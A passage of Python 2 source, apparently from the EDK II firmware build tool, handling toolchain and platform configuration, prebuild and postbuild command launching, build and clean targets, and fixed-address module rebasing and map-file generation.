EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
ToolChainFamily = []
ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
for Tool in self.ToolChainList:
if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
ToolChainFamily.append("MSFT")
else:
ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
self.ToolChainFamily = ToolChainFamily
if self.ThreadNumber == None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
if not self.Db_Flag:
self.Db.InitDatabase()
def InitPreBuild(self):
self.LoadConfiguration()
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
if self.ArchList:
GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
if self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
if self.ToolChainFamily:
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
if 'PREBUILD' in GlobalData.gCommandLineDefines.keys():
self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
else:
self.Db.InitDatabase()
self.Db_Flag = True
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Prebuild = str(Platform.Prebuild)
if self.Prebuild:
PrebuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Prebuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PrebuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PrebuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PrebuildList.append(Arg)
self.Prebuild = ' '.join(PrebuildList)
self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines.keys():
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory,'.cache','.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = itertools.imap(lambda l: l.split('=',1), envs)
envs = itertools.ifilter(lambda l: len(l) == 2, envs)
envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
InfFileNameList = ModuleList.keys()
#InfFileNameList.sort()
for InfFile in InfFileNameList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect funtion address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add funtion address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict.keys():
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid != None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write('%s' % (Line))
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid != None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in ['PEI_CORE', 'PEIM', 'COMBINED_PEIM_DRIVER', 'PIC_PEIM', 'RELOCATABLE_PEIM', 'DXE_CORE']:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in ['BS_DRIVER', 'DXE_DRIVER', 'UEFI_DRIVER']:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['DXE_RUNTIME_DRIVER', 'RT_DRIVER', 'DXE_SAL_DRIVER', 'SAL_RT_DRIVER']:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['SMM_CORE', 'DXE_SMM_DRIVER', 'MM_STANDALONE', 'MM_CORE_STANDALONE']:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == 'DXE_SMM_DRIVER':
PiSpecVersion = '0x00000000'
if 'PI_SPECIFICATION_VERSION' in Module.Module.Specification:
PiSpecVersion = Module.Module.Specification['PI_SPECIFICATION_VERSION']
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize / 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize / 0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize / 0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize / 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize / 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
